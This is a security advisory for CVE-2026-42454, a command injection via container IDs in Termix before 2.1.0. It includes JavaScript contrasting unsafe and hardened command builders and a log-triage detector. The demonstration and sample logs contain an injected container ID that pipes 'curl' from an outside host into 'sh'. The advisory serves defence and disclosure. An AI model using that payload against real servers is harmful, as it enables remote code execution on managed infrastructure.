Critical (9.9)

Termix server RCE via shell injection (CVE-2026-42454)


CVE-2026-42454: Critical RCE in Termix <2.1.0 lets authenticated attackers execute commands on managed servers via malicious container IDs. Update to 2.1.0 immediately.

Patch now - CVE-2026-42454 is a critical OS command injection vulnerability in Termix prior to version 2.1.0 that lets authenticated attackers achieve remote code execution on any managed server. Patched in version 2.1.0 - update immediately.

Overview

CVE-2026-42454 affects the Termix web-based server management platform, specifically its Docker container management endpoints. The vulnerability stems from Termix interpolating the containerId URL path parameter and the equivalent WebSocket message field directly into shell command strings that are then executed on remote managed servers via ssh2.Client.exec(). No sanitization or validation is applied to these inputs, so an authenticated attacker can inject arbitrary OS commands by supplying a container ID that contains shell metacharacters. The injected command runs on the managed server, not on the Termix host, with the privileges of the SSH account Termix uses to connect to that server.
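The pattern described above, shown as an added example rather than Termix's own source: a command builder that splices the container ID into a shell line, beside a hardened builder that allowlists the value and quotes it. Function names and the FakeSshClient stand-in are assumptions; the stand-in has the same exec(cmd, cb) shape as ssh2.Client but records the command string instead of running it.

```javascript
// Added example, not Termix source. Docker accepts a 12- or 64-character hex
// ID, or a name matching [A-Za-z0-9][A-Za-z0-9_.-]+; nothing else is a
// legitimate container reference, so anything else can be rejected outright.
const DOCKER_ID = /^(?:[0-9a-f]{12}|[0-9a-f]{64})$/;
const DOCKER_NAME = /^[A-Za-z0-9][A-Za-z0-9_.-]{0,127}$/;

// Vulnerable pattern: the untrusted value is spliced straight into a shell line.
function buildInspectCommandUnsafe(containerId) {
  return `docker inspect ${containerId}`;
}

function isValidContainerRef(ref) {
  return typeof ref === 'string' && (DOCKER_ID.test(ref) || DOCKER_NAME.test(ref));
}

// POSIX single-quoting: inside '...' only the single quote itself needs
// handling, and it becomes '\'' (close quote, escaped quote, reopen quote).
function shellQuote(s) {
  return "'" + s.replace(/'/g, "'\\''") + "'";
}

// Hardened pattern: allowlist first, then quote as defense in depth. An SSH
// exec channel carries one command string, so there is no argv-style
// parameterisation to fall back on; validation has to happen here.
function buildInspectCommandSafe(containerId) {
  if (!isValidContainerRef(containerId)) {
    throw new Error(`rejected container reference: ${JSON.stringify(containerId)}`);
  }
  return `docker inspect ${shellQuote(containerId)}`;
}

// Stand-in for ssh2.Client (assumption): same exec(cmd, cb) shape, records cmd.
class FakeSshClient {
  exec(cmd, cb) { this.lastCommand = cmd; cb(null); }
}

// Returns the exact command string that would reach the remote shell.
function inspectContainer(client, containerId, hardened) {
  const cmd = hardened
    ? buildInspectCommandSafe(containerId)
    : buildInspectCommandUnsafe(containerId);
  client.exec(cmd, () => {});
  return client.lastCommand;
}

// Demonstration with a constructed malicious ID (203.0.113.5 is a documentation address).
const MALICIOUS_ID = 'a1b2c3d4e5f6; curl http://203.0.113.5/x | sh';
const demoClient = new FakeSshClient();
console.log(inspectContainer(demoClient, MALICIOUS_ID, false));
// -> docker inspect a1b2c3d4e5f6; curl http://203.0.113.5/x | sh   (payload runs on the managed host)
try {
  inspectContainer(demoClient, MALICIOUS_ID, true);
} catch (e) {
  console.log(e.message); // rejected before any command is built
}
console.log(inspectContainer(demoClient, 'a1b2c3d4e5f6', true));
// -> docker inspect 'a1b2c3d4e5f6'
```

The allowlist alone is sufficient here because no valid Docker reference contains a shell metacharacter; the quoting is kept so that a later relaxation of the regex (for example to accept image references) does not silently reopen the hole.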

This issue is classified as CRITICAL with a CVSS score of 9.9. The score reflects a network attack vector, low attack complexity, no user interaction, only low privileges required, and a changed scope: the attacker starts with an ordinary Termix account and ends with command execution on systems beyond the vulnerable component itself.

Impact

An attacker with low-privilege authenticated access to a Termix instance can execute arbitrary operating system commands on any server managed through the platform, at the privilege level of the SSH account Termix uses for that server. This effectively grants control over the managed infrastructure, including the ability to:

  • Deploy malware, ransomware, or cryptocurrency miners
  • Exfiltrate sensitive data, credentials, and configuration files
  • Pivot to other systems within the same network
  • Disrupt or destroy services, leading to operational downtime

Because Termix manages SSH terminals, tunneling, and file editing, a successful compromise could cascade across the entire managed fleet.

Remediation and Mitigation

The vulnerability has been patched in Termix 2.1.0. Organizations using Termix should:

  • Upgrade immediately to version 2.1.0 or later. All earlier versions are affected.
  • If immediate patching is not possible, restrict network access to the Termix web interface to trusted IP addresses only, and treat every Termix account as able to run commands on every managed server: disable or remove accounts that are not strictly needed until the upgrade is done.
  • Audit all existing Termix sessions and container operations for signs of compromise, given the low complexity of exploitation.
  • Review Termix access logs for container management requests whose container ID is not a plausible Docker reference (12 or 64 hex characters, or a short name), and check the SSH and shell history on managed servers for unexpected commands run by the account Termix connects with. Remember that an attacker may percent-encode shell metacharacters in the URL, so decode the path segment before judging it.

There are no workarounds that fully address the vulnerability without upgrading.
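One way to carry out the log review step above, as an added example that is not part of the advisory or of Termix: extract the container ID segment from each request path, decode it, and flag anything that is not a plausible Docker reference or that contains shell metacharacters. The line format, the /containers/<id>/ route layout and the sample lines are constructed assumptions for illustration; adapt the two parsing regexes to the real logs.

```javascript
// Added example, not Termix code. Log format and route layout are assumed.
const VALID_REF = /^(?:[0-9a-f]{12}|[0-9a-f]{64}|[A-Za-z0-9][A-Za-z0-9_.-]{0,127})$/;
const SHELL_META = /[;&|`$(){}<>\\\r\n'"]/;
const LINE = /^(\S+) user=(\S+) method=(\S+) path=(\S+)$/;

// Constructed sample lines (not real Termix output). The third line carries a
// percent-encoded payload; the fourth carries an unencoded one.
const SAMPLE_LOG = [
  '2026-04-01T10:00:01Z user=alice method=GET path=/docker/containers/a1b2c3d4e5f6/inspect',
  '2026-04-01T10:00:02Z user=bob method=POST path=/docker/containers/web-frontend/restart',
  '2026-04-01T10:00:03Z user=bob method=GET path=/docker/containers/abc%3B%20curl%20http%3A%2F%2F203.0.113.5%2Fx%20%7C%20sh/logs',
  '2026-04-01T10:00:04Z user=carol method=GET path=/docker/containers/$(id)/inspect',
];

// Take the raw segment first, then decode it: a percent-encoded "/" or ";"
// must not be allowed to move the segment boundary or hide from the check.
function extractContainerRef(path) {
  const m = /\/containers\/([^/]+)/.exec(path);
  if (!m) return null;
  try {
    return { raw: m[1], decoded: decodeURIComponent(m[1]), decodeError: false };
  } catch (e) {
    // Malformed encoding is itself worth a look; fall back to the raw value.
    return { raw: m[1], decoded: m[1], decodeError: true };
  }
}

// Returns the list of reasons a reference looks suspicious (empty if it is fine).
function classify(ref) {
  const reasons = [];
  if (ref.decodeError) reasons.push('malformed-percent-encoding');
  if (!VALID_REF.test(ref.decoded)) reasons.push('not-a-docker-reference');
  if (SHELL_META.test(ref.decoded)) reasons.push('shell-metacharacter');
  if (ref.decoded.length > 128) reasons.push('oversized');
  return reasons;
}

// Walks the log and returns one finding per suspicious container request.
function triage(lines) {
  const findings = [];
  for (const line of lines) {
    const m = LINE.exec(line);
    if (!m) continue;
    const [, ts, user, method, path] = m;
    const ref = extractContainerRef(path);
    if (!ref) continue;
    const reasons = classify(ref);
    if (reasons.length > 0) {
      findings.push({ ts, user, method, containerRef: ref.decoded, reasons });
    }
  }
  return findings;
}

for (const finding of triage(SAMPLE_LOG)) {
  console.log(JSON.stringify(finding));
}
// -> two findings: bob's encoded "abc; curl ... | sh" and carol's "$(id)"
```

The same allowlist that the fix should enforce server-side doubles as the detection rule: every legitimate request satisfies it, so anything that fails it is either a client bug or an attack, and both deserve a look. The WebSocket path mentioned in the overview needs the same check applied to the message field rather than the URL.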

Security Insight

This vulnerability is an instance of a recurring pattern in management platforms: user-supplied data is spliced into a shell command without validation. Container identifiers are a common culprit because they look like opaque, machine-generated values and get treated as trusted parameters, when in fact the client controls every byte; similar issues have recurred in other remote management consoles. Termix's architecture of executing commands on remote servers over SSH amplifies the risk, because the injection lands not on the Termix host but on every server it manages, each of which becomes a potential beachhead. The critical takeaway is that any API endpoint that builds a shell command from request data must treat that data as untrusted regardless of authentication status. An SSH exec channel carries a single command string rather than an argument vector, so there is no true parameterized execution to reach for; the practical defense is a strict allowlist (Docker container IDs are 12 or 64 hex characters, and names are restricted to a narrow character set) combined with correct shell quoting as defense in depth, applied to every value that reaches a remote shell, not just container IDs.
